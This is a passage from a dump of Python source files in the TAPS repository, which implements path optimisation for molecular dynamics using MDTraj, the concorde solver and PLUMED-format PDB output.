file=fc)\n\t\tfc.close()\n\n\t\t# ==============================================================================================================\n\t\t# combine two files as input for concorde\n\t\t# ==============================================================================================================\n\t\trmsdINT = self.pathName + '.conc'\n\t\tfiles = ['head.conc', 'rmsd.conc']\t# head.conc - input records #\n\t\twith open(rmsdINT, 'w') as combine:\n\t\t\tfor file_ in files:\n\t\t\t\tfor line in open(file_, 'r'):\n\t\t\t\t\tcombine.write(line)\n\t\tcmd = \"concorde %s\" % rmsdINT\n\t\tos.system(cmd) # run concorde\n\n\t\t# read concorde output and get new order\n\t\tresult = self.pathName + '.sol'\n\t\tfr = open(result,'r+')\n\t\tlines = fr.readlines()\n\t\tfr.close()\n\n\t\tlines.pop(0) # remove the first line\n\t\ttmp=''.join(lines).replace('\\n', '').split(' ')\n\t\ttmp.remove('')\n\t\tnds=np.array(list(map(int,tmp)),dtype=int) # index before reorder\n\t\tbrk=np.argmax(nds) # maxvalue is the virtual node\n\t\torder = np.append(nds[(brk + 1):len(nds)], nds[0:brk])\n\n\t\t# If initial node is after final node in new order, reverse the order \n\t\tsi = np.where(order == 0)[0]\n\t\tti = np.where(order == len(order)-1)[0]\n\t\tif si > ti:\n\t\t\torder = order[::-1]\n\n\t\t#t0=time.time()\n\n\t\t# reorder the median(z) conformations as new path nodes\n\t\tnewList = []\n\t\tori = []\n\t\tfor i in range(len(order)):\n\t\t\tnode = self.nodes.slice(order[i]) # nodes are Confs instances\n\t\t\tnewList.append(node)\n\t\t\tori.append(self.oriDIR[order[i]])\n\t\t#print('+++DEBUG+++ reOrdered oriDIR = ', ori)\n\t\t#t1=time.time()\n\t\t#print('+++DEBUG+++ Slicing nodes took', t1-t0, 'sec') \n\n\t\t#t0=time.time()\n\t\tself.nodes = Confs.merge(newList)\n\t\t#t1=time.time()\n\t\t#print('+++DEBUG+++ Merging nodes took', t1-t0, 'sec') \n\t\tself.n_nodes = len(self.nodes)\t\t\n\t\tself.pcv(dire=dire)\n\t\tself.oriDIR=ori\n \n\t\t# clean up concorde files\n\t\tfor f in glob.glob(\"*.sav\"):\n\t\t\tos.remove(f)\n\t\tfor f in glob.glob(\"*.pul\"):\n\t\t\tos.remove(f)\n\t\tfor f in glob.glob(\"*.mas\"):\n\t\t\tos.remove(f)\n\t\tfor f in glob.glob(\"*.conc\"):\n\t\t\tos.remove(f)\n\t\tfor f in glob.glob(\"*.sol\"):\n\t\t\tos.remove(f)\n\n\t# ==================================================================================================================\n\t# Truncate the nodes of path beyond the two fixed terminals\n\t# ==================================================================================================================\n\tdef truncate(self, iNode, fNode):\n\t\tori = deepcopy(self.oriDIR)\n\t\tif (iNode is None) or (fNode is None):\n\t\t\traise ValueError(\"the two terminal nodes must be provided for truncation\")\n\t\telse:\n\t\t\tinitNode = deepcopy(iNode)\n\t\t\tfinNode = deepcopy(fNode)\n\t\t\tsub_nodes=self.nodes.atom_slice(self.pcvInd.atomSlice)\n\t\t\tsub_i = initNode.atom_slice(self.pcvInd.atomSlice)\n\t\t\tsub_f = finNode.atom_slice(self.pcvInd.atomSlice)\n\t\t\tsub_nodes.superpose(sub_i,0,self.pcvInd.align)\n\t\t\tr1 = md.rmsd(sub_nodes,sub_i,0,self.pcvInd.rms)\n\t\t\tsi = np.argmin(r1)\t#Give the index of minimum value of r1(md.rmsd) in axis==0#\n\t\t\tsub_nodes.superpose(sub_f,0, self.pcvInd.align)\n\t\t\tr2 = md.rmsd(sub_nodes,sub_f,0,self.pcvInd.rms)\t\n\t\t\tti = np.argmin(r2)\t#search for index of initial and final conformations#\n\t\t\tif si > ti:\t#add initial and final nodes to two terminals#\n\t\t\t\t# add self.initNode and self.finNode at terminals\n\t\t\t\tlistNodes = []\n\t\t\t\tlistNodes.append(finNode)\n\t\t\t\tlistNodes.append(self.nodes.slice(np.arange(ti, si + 1)))\n\t\t\t\tlistNodes.append(initNode)\n\t\t\t\tnewNodes = Confs.merge(listNodes)\n\t\t\t\tori=ori[ti:(si+1)]\n\t\t\telse:\n\t\t\t\t# add self.initNode and self.finNode at terminals\n\t\t\t\tlistNodes = []\n\t\t\t\tlistNodes.append(initNode)\n\t\t\t\tlistNodes.append(self.nodes.slice(np.arange(si, ti + 1))) \n\t\t\t\tlistNodes.append(finNode)\n\t\t\t\tnewNodes = Confs.merge(listNodes)\t\t\t\n\t\t\t\tori=ori[si:(ti+1)]\n\t\t\tori.insert(len(ori)-1,ori[len(ori)-1])\n\t\t\tori.insert(0,ori[0])\n\t\t\tnewPath = Path(self.pathName+'_tr',self.pcvInd,newNodes,ori)\n\t\t\t#print('+++DEBUG+++ truncated oriDIR = ', ori)\n\t\treturn newPath\n\n\t# ==================================================================================================================\n\t# Shorten the path by skiping nodes i-j if d[i-1,j+1] is already shorter than tolerable maximum distance\n\t# finding short-cuts (if any) avoid unnecessary curvature and loop;\n\t# This will make the path as straight as the sampled data allows\n\t# ==================================================================================================================\n\tdef rmClose(self,tolDist,doPBC=False):\n\t\tori = deepcopy(self.oriDIR)\n\t\t# prepare for rmsd computation\n\t\tpathConfs = self.nodes\n\t\tif doPBC:\n\t\t\tpathConfs.image_molecules()\n\t\tsub_confs = pathConfs.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_confs.superpose(sub_confs, 0, self.pcvInd.align)\n\t\ti = 0 # starting from the first node\n\t\twhile (i < pathConfs.n_frames):\n\t\t\tdistances = md.rmsd(sub_confs, sub_confs, i, self.pcvInd.rms)\n\t\t\t# make initial self-distance ultra-large\n\t\t\tdistances[i]=1000000000\n\t\t\tshortcuts = np.where(distances <= tolDist)[0]\n\t\t\t# print('number of nodes in path: ', pathConfs.n_frames)\n\t\t\t# print('short-cuts = ',shortcuts)\n\t\t\tif (len(shortcuts) <= 0): # no short-cuts found, move to the next node\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tscID = np.max(shortcuts)\n\t\t\t\tif (scID>i):\n\t\t\t\t\t# print('node', i, ' short-cut to node', scID)\n\t\t\t\t\t# scID is not yet the last frame, cut the frames inbetween out\n\t\t\t\t\tif (scID < (pathConfs.n_frames - 1)):\n\t\t\t\t\t\tcuts = np.append(np.array(range(i + 1)), np.array(range(scID, pathConfs.n_frames)))\n\t\t\t\t\t\t# print('cuts=',cuts)\n\t\t\t\t\t\tsub_confs = sub_confs.slice(cuts)\n\t\t\t\t\t\tpathConfs = pathConfs.slice(cuts)\n\t\t\t\t\t\tdel ori[(i+1):(scID-1)]\n\t\t\t\t\t\ti += 1\n\t\t\t\t\t# already the last frame in path, jump out of loop\n\t\t\t\t\telse:\n\t\t\t\t\t\tcuts = np.append(np.array(range(i + 1)), np.array(range(scID, pathConfs.n_frames)))\n\t\t\t\t\t\t# print('cuts=', cuts)\n\t\t\t\t\t\tsub_confs = sub_confs.slice(cuts)\n\t\t\t\t\t\tpathConfs = pathConfs.slice(cuts)\n\t\t\t\t\t\t# update information about original directory of the remaining nodes \n\t\t\t\t\t\tdel ori[(i+1):(scID-1)]\n\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\ti+=1 # closest node appears before the current node; move to the next node\n\t\tnewPath = Path(self.pathName + '_rc', self.pcvInd, pathConfs, ori)\n\t\treturn newPath\n\n\t# ==================================================================================================================\n\t# Insert conformations between neighbor nodes i,i+1, if d[i,i+1] > tolerable maximum distance\n\t# 1. ensure conformation f is closer to node i and i+1 than other nodes on path\n\t# 2. ensure conformation f is on the vertical lines between node i,i+1 |d[f,i]-d[f,i+1]| < (d[i,i+1]*devMID)\n\t# 3. ensure cosTheta = (d[i, f]*2 + d[i+1,f]*2 - d[i,i+1]) < tolCos\n\t# 4. finding short-cuts (if any) avoid unnecessary curvature and loop, using function rmClose\n # traj is a mdTraj.Trajectory object or the Confs object\n # NOTE THAT distantNB shall be a 1D numpy array; dire is where the traj data is located\n\t# ==================================================================================================================\n\tdef insert(self, traj, dire=None, tolDist=0.015, devMID=0.1, tolCos=0, doPBC=False, distantNB = None):\n\t\t#==================================================================================\n\t\t# copy current nodes into a path, prepare for rmsd computation \n\t\t#==================================================================================\n\t\tpathConfs = deepcopy(self.nodes)\n\t\tif doPBC:\n\t\t\tpathConfs.image_molecules()\n\t\t#t0 = time.time()\n\t\tsub_opath = pathConfs.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_opath.superpose(sub_opath, 0, self.pcvInd.align)\n\t\t#t1 = time.time()\n\t\t#print(\"+++DEBUG+++ Insertion: path superposition took \", t1 - t0, ' sec')\n\n\t\t#==================================================================================\n\t\t# prepare data for rmsd computation\n\t\t#==================================================================================\n\t\t# align sampled data to the first node of path\n\t\ttrj = traj\n\t\tif doPBC:\n\t\t\ttrj.image_molecules()\n\t\t#t0 = time.time()\n\t\tsub_data = trj.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_data.superpose(sub_opath, 0, self.pcvInd.align)\n\t\t#t1 = time.time()\n\t\t#print(\"+++DEBUG+++ Insertion: trajData superposition took \", t1 - t0, ' sec')\n\n \t#==============================================================================================\n\t\t# Decide which pair of neighbor nodes are distant (> tolDist)\n\t\t#============================================================================================== \n\t\t# if provided as input (distantNB), insertion is only performed in that pair\n\t\t#==============================================================================================\n\t\tif distantNB is not None:\n\t\t\ttopInsert = deepcopy(distantNB)\n\t\t#==============================================================================================\n\t\t# otherwise, scan the initial path, label the neighbors whose distance is larger than tolDist\n\t\t#==============================================================================================\n\t\telse:\n\t\t\ttmp = []\n\t\t\tfor i in range((sub_opath.n_frames - 1)):\n\t\t\t\tdist = md.rmsd(sub_opath.slice(i), sub_opath.slice(i + 1), 0, self.pcvInd.rms)\n\t\t\t\tif dist > tolDist:\n\t\t\t\t\ttmp.append(i)\n\t\t\ttopInsert = np.array(tmp)\n\t\t# print('+++DEBUG+++ toInsert=',toInsert)\n\n\t\t#=============================================================================================\n\t\t# remove the path node from dataset\n\t\t#=============================================================================================\n\t\t#t0 = time.time()\n\t\tfor i in range(sub_opath.n_frames):\n\t\t\tdist = md.rmsd(sub_data, sub_opath.slice(i), 0, self.pcvInd.rms)\n\t\t\tind_zero = np.where(dist > 0)[0]\n\t\t\tsub_data = sub_data.slice(ind_zero)\n\t\t\ttrj = trj.slice(ind_zero)\n\t\t#t1 = time.time()\n\t\t#print(\"+++DEBUG+++ Node removal from trajData took \", t1 - t0, ' sec')\n\n\t\tori = deepcopy(self.oriDIR)\n\t\twhile len(toInsert) > 0:\n\t\t\ti1 = toInsert[0]\n\t\t\ti2 = i1 + 1\n\t\t\t# print('+++DEBUG+++ Searching for conformations to insert between node %d & %d' % (i1,i2))\n\t\t\t#==========================================================================================\n\t\t\t# Criterion 1: conf to insert must be closer to the i1 or i2 than any other nodes\n\t\t\t#==========================================================================================\n\t\t\t# loop over all path nodes\n\t\t\tdists = np.empty([sub_opath.n_frames, sub_data.n_frames])\n\t\t\tfor i in range(sub_opath.n_frames):\n\t\t\t\tdists[i] = md.rmsd(sub_data, sub_opath, i, self.pcvInd.rms)\n\t\t\tr1 = dists[i1]\n\t\t\tr2 = dists[i2]\n\t\t\tind_data = np.arange(sub_data.n_frames)\n\t\t\tr12 = md.rmsd(sub_opath.slice(i1), sub_opath.slice(i2), 0, self.pcvInd.rms)\n\t\t\t# Criterion 2: |r1-r2|< r12/scale_r12, i.e. conf to insert must be in the middle of i1,i2\n\t\t\tscale_r12 = 0.01\n\t\t\twhile (scale_r12 < devMID):\n\t\t\t\tlogic_mid = (np.absolute(r1 - r2) < (r12 * scale_r12)) # r1-r2->0\n\t\t\t\t# print('+++DEBUG+++ logic_mid at scale_r12=', scale_r12, ': ',np.where(logic_mid)[0].size)\n\t\t\t\tcosTheta = (r1 ** 2 + r2 ** 2 - r12 ** 2) / (2 * r1 * r2)\n\t\t\t\t# Criterion 3: cos(Theta) must be smaller than preset-value\n\t\t\t\tlogic_cos = (cosTheta < tolCos) # cosTheta < 0, theta > 90 degrees\n\t\t\t\tlogic_candidate = (logic_mid & logic_cos)\n\t\t\t\t# print('+++DEBUG+++ logic_both at scale_r12=', scale_r12, ': ',np.where(logic_candidate)[0].size)\n\t\t\t\tn_candidate = np.where(logic_candidate)[0].size\n\t\t\t\tif n_candidate > 0: # if jump out of loop and proceed\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tscale_r12 *= 2\n\t\t\t# print('+++DEBUG+++ number of candidates: %d' % n_candidate)\n\t\t\t# if there is data meeting both criteria, select the min(cos(Theta))\n\t\t\tif n_candidate > 0:\n\t\t\t\tind_candidate = ind_data[logic_candidate]\n\t\t\t\tsel = ind_candidate[np.argmin(cosTheta[logic_candidate])] # find the candidate index in original data\n\t\t\t\t# print('+++DEBUG+++ Found conformations between %d-%d, in data[%d]' % (i1, i2, sel))\n\t\t\t\ttmp = []\n\t\t\t\ttmp.append(Confs.traj2conf(pathConfs.slice(range(i2))))\n\t\t\t\ttmp.append(Confs.traj2conf(trj.slice(sel)))\n\t\t\t\ttmp.append(Confs.traj2conf(pathConfs.slice(range(i2, len(pathConfs)))))\n\t\t\t\tpathConfs = Confs.merge(tmp)\n\n\t\t\t\t# PathConfs.insert(i2, trj.slice(sel))\n\t\t\t\ttmp = []\n\t\t\t\ttmp.append(Confs.traj2conf(sub_opath.slice(range(i2))))\n\t\t\t\ttmp.append(Confs.traj2conf(sub_data.slice(sel)))\n\t\t\t\ttmp.append(Confs.traj2conf(sub_opath.slice(range(i2, len(sub_opath)))))\n\t\t\t\tsub_opath = Confs.merge(tmp)\n\t\t\t\t# print('+++DEBUG+++ inserted pathConfs=', pathConfs) \n\n\t\t\t\t# update original directory where nodes are extracted\n\t\t\t\tori.insert(i2,dire)\n\n\t\t\t\t# remove the conformation from dataset\n\t\t\t\tind_data = np.delete(ind_data, sel)\n\t\t\t\t# print('+++DEBUG+++ Removing selected conformation from dataset, %d conformations left' % len(ind_data))\n\t\t\t\ttrj = trj.slice(ind_data)\n\t\t\t\tsub_data = sub_data.slice(ind_data)\n\t\t\t\t# update the list toInsert\n\t\t\t\t# if r1,r2 > tolDist, extra insertion is still needed in both pairs\n\t\t\t\tif ((r1[sel] > tolDist) and (r2[sel] > tolDist)):\n\t\t\t\t\t# print('+++DEBUG+++ ', r1[sel],'>',tolDist,'\\t',r2[sel],'>',tolDist)\n\t\t\t\t\ttoInsert[1:len(toInsert)] = toInsert[1:len(toInsert)] + 1\n\t\t\t\t\ttoInsert = np.insert(toInsert, 1, i2)\n\t\t\t\t# if r1,r2 <= tolDist, extra insertion is not necessary\n\t\t\t\telif ((r1[sel] <= tolDist) and (r2[sel] <= tolDist)):\n\t\t\t\t\t# print('+++DEBUG+++ ', r1[sel], '<=', tolDist, '\\t', r2[sel], '<=', tolDist)\n\t\t\t\t\ttoInsert = toInsert + 1\n\t\t\t\t\ttoInsert = np.delete(toInsert, 0) \n\n\t\t\t\t# if r1<=tolDist, r2>tolDist, only insert between newly inserted conf and i2\n\t\t\t\telif ((r1[sel] <= tolDist) and (r2[sel] > tolDist)):\n\t\t\t\t\t# print('+++DEBUG+++ ', r1[sel], '<=', tolDist, '\\t', r2[sel], '>', tolDist)\n\t\t\t\t\ttoInsert = toInsert + 1\n\t\t\t\t# if r1>tolDist, r2<=tolDist, only insert between i1 and newly inserted\n\t\t\t\telse:\n\t\t\t\t\t# print('+++DEBUG+++ ', r1[sel], '>', tolDist, '\\t', r2[sel], '<', tolDist)\n\t\t\t\t\ttoInsert[1:len(toInsert)] = toInsert[1:len(toInsert)] + 1\n\t\t\t\t\t# print('+++DEBUG+++ toInsert=', toInsert)\n\t\t\t\t#print('+++DEBUG+++ inserted oriDIR = ', ori)\n\t\t\telse:\n\t\t\t\t# print('No conformation found between %d-%d' % (i1,i2))\n\t\t\t\ttoInsert = np.delete(toInsert,0)\n\t\t\t\t# print('+++DEBUG+++ after trial toInsert=',toInsert)\n\t\t#print('+++DEBUG+++ inserted oriDIR = ', ori)\n\t\treturn Path(self.pathName + '_in', self.pcvInd, pathConfs, ori)\n\n\t# ==================================================================================================================\n\t# Find neighbours that are distant (rmsd > cutoff)\n\t# return a list of mdtraj.trajectory object, each containing only the two distant neighbor nodes\n\t# =================================================================================================================\n\tdef distantNeighbors(self, tolDist=0.015, doPBC=False):\n\t\t# copy path nodes\n\t\tnodes = deepcopy(self.nodes)\n\t\tn = nodes.n_frames\n\t\t# compute rmsd between neighbor nodes\n\t\tif doPBC:\n\t\t\tnodes.image_molecules()\n\t\tsub_nodes = nodes.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_nodes.superpose(sub_nodes, 0, self.pcvInd.align)\n\n\t\tfarFirst=[] \n\t\tlistDistant = []\n\t\tlistDIRs=[]\n\t\t# find all distant pairs, recording by first node of each pair in farFirst\n\t\t# extract the terminal nodes for subsequent tmd simulations \n\t\t# extract the original DIRs from which the node was extracted in this iteration\n\t\tfor i in range(n-1):\n\t\t\tdist = md.rmsd(sub_nodes.slice(i), sub_nodes.slice(i+1), 0, self.pcvInd.rms)\n\t\t\t#print('+++DEBUG+++ dist[',i,'][',i+1,']=',dist)\n\t\t\tif dist > tolDist:\n\t\t\t\tfarFirst.append(i)\n\t\t\t\tlistDistant.append(nodes.slice([i,i+1]))\n\t\t\t\t#print('+++DEBUG+++ i=',i)\n\t\t\t\t#print('+++DEBUG+++ oriDIR[i]=',self.oriDIR[i])\n\t\t\t\t#print('+++DEBUG+++ oriDIR[i+1]=',self.oriDIR[i+1])\n\t\t\t\tlistDIRs.append([self.oriDIR[i],self.oriDIR[i+1]])\n\n\t\t#print('+++DEBUG+++ farFirst=',farFirst)\n\t\t#print('+++DEBUG+++ listDIRs=',listDIRs)\n\n\t\t# cut path into segments\n\t\tsegInd=[] # segments indices of path\n\t\tnfar = len(farFirst)\n\t\tif farFirst[0]>0:\n\t\t\tsegInd.append(list(range(0,farFirst[0])))\n\t\tfor i in range(nfar-1):\n\t\t\tsegInd.append(list(range(farFirst[i],farFirst[i]+2)))\n\t\t\tif (farFirst[i]+2)<farFirst[i+1]:\n\t\t\t\tsegInd.append(list(range(farFirst[i]+2,farFirst[i+1])))\n\t\t\t#print('+++DEBUG+++ segInd=',segInd)\n\t\tsegInd.append(list(range(farFirst[nfar-1],farFirst[nfar-1]+2)))\n\t\tif (farFirst[nfar-1]+1) < (n-1):\n\t\t\tsegInd.append(list(range(farFirst[nfar-1]+2,n)))\n\t\t\t#print('+++DEBUG+++ segInd=',segInd)\n\t\t# generate mapping from farFirst to which segments \n\t\tfarInSeg=[]\n\t\tj=0\n\t\tfor i in range(len(segInd)):\n\t\t\tif farFirst[j] == segInd[i][0]:\n\t\t\t\tfarInSeg.append(i)\n\t\t\t\tj+=1\n\t\t\t\tif j>=nfar:\n\t\t\t\t\tbreak\n\t\t\t#print('+++DEBUG+++ farInSeg=',farInSeg)\n\t\t#print('+++DEBUG+++ farInSeg=',farInSeg)\n\t\treturn (listDistant, listDIRs, segInd, farInSeg)\n \n\tdef pSlice(self, ind): # ind is a list \n\t\tsegNodes = Confs.traj2conf(self.nodes.slice(ind))\n\t\tsegDIR = [self.oriDIR[i] for i in ind] \t\t\t\n\t\tsegPath = Path(\"seg\", self.pcvInd, segNodes, segDIR)\n\t\treturn segPath\n"
},
{
"alpha_fraction": 0.6534839868545532,
"alphanum_fraction": 0.6758138537406921,
"avg_line_length": 40.7528076171875,
"blob_id": "95895ad8579cb41891388f54035f2ee7ede0e72e",
"content_id": "62984abd0e929baf7870d5036ea41ac6b77081cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3717,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 89,
"path": "/PluPDB.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function, division\nimport numpy as np\nfrom mdtraj.utils import ilen\nimport mdtraj.formats.pdb.pdbfile as pdb\n\ndef _format_83(f):\n\t\"\"\"Format a single float into a string of width 8, with ideally 3 decimal\n\tplaces of precision. If the number is a little too large, we can\n\tgracefully degrade the precision by lopping off some of the decimal\n\tplaces. If it's much too large, we throw a ValueError\"\"\"\n\tif -999.999 < f < 9999.999:\n\t\treturn '%8.3f' % f\n\tif -9999999 < f < 99999999:\n\t\treturn ('%8.3f' % f)[:8]\n\traise ValueError('coordinate \"%s\" could not be represented '\n\t\t'in a width-8 field' % f)\n\nclass PluPDBfile(pdb.PDBTrajectoryFile):\n\tdef __init__(self, filename, mode='r', force_overwrite=True, standard_names=True):\n\t\tpdb.PDBTrajectoryFile.__init__(self, filename, mode, force_overwrite) #, standard_names)\n\t\t# pdb.PDBTrajectoryFile.__init__(self, filename, mode, force_overwrite, standard_names)\n\t\t# do not write footer; footer will add an extra END at the last line and causes crash of plumed\n\t\tself._footer_written = True\n\n\tdef write(self, positions, topology, frame_ind=None, pcv_ind=None, unitcell_lengths=None,\n\t\tunitcell_angles=None):\n\t\t\"\"\"Write a PDB file to disk using plumed2 PCV format\n\n\t\tParameters\n\t\t----------\n\t\tpositions : array_like\n\t\t\tThe list of atomic positions to write.\n\t\ttopology : mdtraj.Topology\n\t\t\tThe Topology defining the model to write.\n\t\tframe_ind : {int, None}\n\t\t\tIf not None, the index of frames will be surrounded by REMARK X=? and END\n\t\tunitcell_lengths : {tuple, None}\n\t\t\tLengths of the three unit cell vectors, or None for a non-periodic system\n\t\tunitcell_angles : {tuple, None}\n\t\t\tAngles between the three unit cell vectors, or None for a non-periodic system\n\t\t\"\"\"\n\t\tif not self._mode == 'w':\n\t\t\traise ValueError('file not opened for writing')\n\t\tif not self._header_written:\n\t\t\tself._write_header(unitcell_lengths, unitcell_angles)\n\t\t\tself._header_written = True\n\n\t\tif ilen(topology.atoms) != len(positions):\n\t\t\traise ValueError('The number of positions must match the number of atoms')\n\t\tif np.any(np.isnan(positions)):\n\t\t\traise ValueError('Particle position is NaN')\n\t\tif np.any(np.isinf(positions)):\n\t\t\traise ValueError('Particle position is infinite')\n\n\t\tself._last_topology = topology # Hack to save the topology of the last frame written, allows us to output CONECT entries in write_footer()\n\n\t\tposIndex = 0\n\t\tif frame_ind is not None:\t#Finished#\n\t\t\tprint(\"REMARK X=%d\" % frame_ind, file=self._file)\n\t\t\tfor (chainIndex, chain) in enumerate(topology.chains):\n\t\t\t\tchainName = self._chain_names[chainIndex % len(self._chain_names)]\n\t\t\t\tresidues = list(chain.residues)\n\t\t\t\tfor (resIndex, res) in enumerate(residues):\n\t\t\t\t\tif len(res.name) > 3:\n\t\t\t\t\t\tresName = res.name[:3]\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tresName = res.name\n\t\t\t\t\tfor atom in res.atoms:\n\t\t\t\t\t\tif len(atom.name) < 4 and atom.name[:1].isalpha() and (\n\t\t\t\t\t\t\tatom.element is None or len(atom.element.symbol) < 2):\n\t\t\t\t\t\t\tatomName = ' ' + atom.name\n\t\t\t\t\t\telif len(atom.name) > 4:\n\t\t\t\t\t\t\tatomName = atom.name[:4]\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tatomName = atom.name\n\t\t\t\t\t\tcoords = positions[posIndex]\n\t\t\t\t\t\tif atom.element is not None:\n\t\t\t\t\t\t\tsymbol = atom.element.symbol\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tsymbol = ' '\n\t\t\t\t\t\tline = \"ATOM %5d %-4s %3s %1s%4d %s%s%s %5.2f %5.2f %-4s%-2s \" % (\n\t\t\t\t\t\t\tpcv_ind.atomInd[posIndex] % 100000, atomName, resName, chainName,\n\t\t\t\t\t\t\t(res.resSeq) % 10000, _format_83(coords[0]),\n\t\t\t\t\t\t\t_format_83(coords[1]), _format_83(coords[2]),\n\t\t\t\t\t\t\tpcv_ind.alignPLU[posIndex], pcv_ind.rmsPLU[posIndex], atom.segment_id[:4], symbol[-2:])\n\t\t\t\t\t\tassert len(line) == 80, 'Fixed width overflow detected'\n\t\t\t\t\t\tprint(line, file=self._file)\n\t\t\t\t\t\tposIndex += 1\n\t\t\tprint(\"END\", file=self._file)\n\n"
},
{
"alpha_fraction": 0.6381083130836487,
"alphanum_fraction": 0.6463330984115601,
"avg_line_length": 39.47222137451172,
"blob_id": "138a44e657d32588a14963a6889da26a2406ace4",
"content_id": "559c60118de6b543028964e13054bfcaaf18c08c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1459,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 36,
"path": "/PcvInd.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "__author__ = 'Lizhe Zhu'\n\nimport numpy as np\n\nclass PcvInd(object):\n\t\"\"\"\n\tattributes:\n\tatomInd numpy.int: combined set of input align & input rms: (atomIndex in PDB, atomInd-1=index in TAPS)\n\talign numpy.int: which atoms in atomInd to align trajectory: for MDTraj\n\trms numpy.int: which atoms in atomInd to compute RMSD : for MDTraj\n\talignPLU numpy.float: output numpy array, if used to align: for Plumed\n\trmsPLU numpy.float: output numpy array, if used to compute rmsd: for Plumed\n\t\"\"\"\n\tdef __init__(self, align = None, rms = None):\t\t\n\t\t\"\"\"\n\t\t:param align: index for alignment, numpy array (1,x)\n\t\t:param rms: index for RMSD computation numpy array (1,x)\n\t\t\"\"\"\n\t\tif (align is None) or (rms is None):\n\t\t\tself.atomInd, self.align, self.rms, self.atomSlice, self.alignPLU, self.rmsPLU = None, None, None, None, None, None\n\t\telse:\n\t\t\ta=align.astype(int)\n\t\t\tr=rms.astype(int)\n\t\t\tself.atomInd = np.unique(np.append(a, r))\t\n\t\t\tself.atomSlice = np.subtract(self.atomInd,1)\t\n\t\t\tself.align, self.rms = np.zeros(len(align),dtype=np.int), np.zeros(len(rms),dtype=np.int)\n\t\t\ttmp = len(self.atomInd)\n\t\t\tself.alignPLU, self.rmsPLU = np.zeros(tmp), np.zeros(tmp)\n\t\t\tfor ia in range(len(align)):\n\t\t\t\tid = np.where(self.atomInd == align[ia])[0]\t\t\n\t\t\t\tself.align[ia] = id \t\n\t\t\t\tself.alignPLU[id] = 1.00\t\n\t\t\tfor ir in range(len(rms)):\t\n\t\t\t\tid = np.where(self.atomInd == rms[ir])[0]\n\t\t\t\tself.rms[ir] = id\n\t\t\t\tself.rmsPLU[id] = 1.00\t\n\n"
},
{
"alpha_fraction": 0.5840572118759155,
"alphanum_fraction": 0.5862715244293213,
"avg_line_length": 36.39490509033203,
"blob_id": "2adaa47c7571369d2dade82b34eb4b1b315cbde2",
"content_id": "d1043d3f2069fe85b534c38e1163e83626335127",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5871,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 157,
"path": "/Confs.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function, division\nimport mdtraj as md\nimport numpy as np\nimport PluPDB as plu\nfrom mdtraj.utils import in_units_of\nfrom copy import deepcopy\n\nclass Confs(md.Trajectory): # inherit class Trajectory in mdtraj\n\t\"\"\"Container object for a molecular dynamics conformations, built upon Class Trajectory from MDTraj\n\n\t# ==============\n\tChild Attributes\n\t# ==============\n\tgc : int [the index for the geometrically central confomration within this trajectory]\n\n\t# ==============\n\tChild Method\n\t# ==============\n\tatom_slice() overrides parent class mdtraj.Trajectory\n\tsave_plu2()\n\t\"\"\"\n\t@property\n\tdef gc(self):\n\t\t\"\"\"\n\t\tThe index of geometric central conformation in the this Trajectory\n\t\t:return:\n\t\tgc : int\n\t\tThe index of geometric central conformation in the this Trajectory\n\t\t\"\"\"\n\t\treturn self._gc\n\n\[email protected]\n\tdef gc(self, value):\n\t\t\"\"\"\n\t\tThe index of geometric central conformation in the this Trajectory\n\t\t:return:\n\t\tgc : int\n\t\t\tThe index of geometric central conformation in the this Trajectory\n\t\t\"\"\"\n\t\tself._gc = value\n\n\tdef __init__(self, xyz, topology, gc=None, time=None, unitcell_lengths=None, unitcell_angles=None):\n\n\t\t# call constructor of parent class md.Trajectory\n\t\t\"\"\"\n\t\t:rtype: Confs\n\t\t\"\"\"\n\t\tsuper(Confs,self).__init__(xyz, topology, time, unitcell_lengths, unitcell_angles)\n\t\t#md.Trajectory.__init__(self, xyz, topology, time, unitcell_lengths, unitcell_angles) # equal to last line\n\n\t\t# geometric center has no default\n\t\tself._gc = gc\n\n\t# ==================================================================================================================\n\t# convert a mdtraj.Trajectory object into Confs to enable TAPS-relevant functions\n\t# ==================================================================================================================\n\t@classmethod\n\tdef traj2conf(self,trj):\t#Finished#\n\t\ttmp=Confs(trj.xyz,trj.topology,None)\n\t\ttmp.__dict__=trj.__dict__\n\t\ttmp.gc=None\n\t\treturn tmp\n\n\t# ==================================================================================================================\n\t# merges a few confs/mdtraj.trajectories into one, regardless of how many frames are in each Conf\n\t# ==================================================================================================================\n\t@classmethod\n\tdef merge(self, listConfs):\n\t\tnlist = len(listConfs) \n\t\tif nlist>0:\n\t\t\ttot = 0\n\t\t\tmerged = deepcopy(listConfs[0])\n\t\t\t#merged = listConfs[0], # only differ from deepcopy by 1 sec\n\t\t\tfor i in range(nlist):\n\t\t\t\tn = listConfs[i].n_frames\n\t\t\t\tlistConfs[i].time =list(range(tot, tot + n))\n\t\t\t\tif i > 0:\n\t\t\t\t\tmerged=merged.join(listConfs[i])\n\t\t\t\ttot += n\n\t\t\treturn merged\n\t\telse:\n\t\t\treturn None\n\n\t# ==================================================================================================================\n\t# find the geometric centroid of a Confs object containing multiple conformations, return the gc as one-frame Confs\n\t# ==================================================================================================================\n\tdef geoCentroid(self, pcvInd=None, doPBC=False):\n\t\t\"\"\"\n\t\tfind the geometric central conformation and extract it into a new Confs instance\n\t\tand update the index into\n\n\t\tpcvInd\n\n\t\t:return:\n\t\tgcc : Confs\n\t\t\"\"\"\n\t\tif pcvInd is 